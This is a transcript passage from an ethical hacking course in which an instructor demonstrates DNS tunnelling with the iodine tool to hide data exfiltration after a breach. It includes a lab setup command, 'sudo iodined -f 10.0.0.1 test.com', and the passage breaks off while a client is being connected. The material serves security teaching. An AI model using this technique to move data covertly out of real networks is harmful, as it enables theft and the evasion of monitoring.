From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots


Tunneling through DNS with iodine


- [Instructor] Once we've breached the system and want to start sending data back, we might want to hide our exfiltration in a protocol which is unlikely to be monitored. One such protocol is DNS, and Kali comes with a tool called iodine, which is designed for exactly this purpose. We'll normally run this using a registered public server, but for the purposes of understanding how it works, let's set our iodine server up on Kali. We do that quite simply by entering sudo iodined -f 10.0.0.1 test.com and we'll enter our password for the transmissions. Okay, we've instructed iodine to create a new virtual network using the IP address 10.0.0.1 with a DNS name of test.com. Let's check in Wireshark to confirm this. We can see we've now got a new network adapter called dns0. Let's start capturing traffic on that. I've already installed iodine on Hydra, so let's use the client to connect to our server using the same DNS…
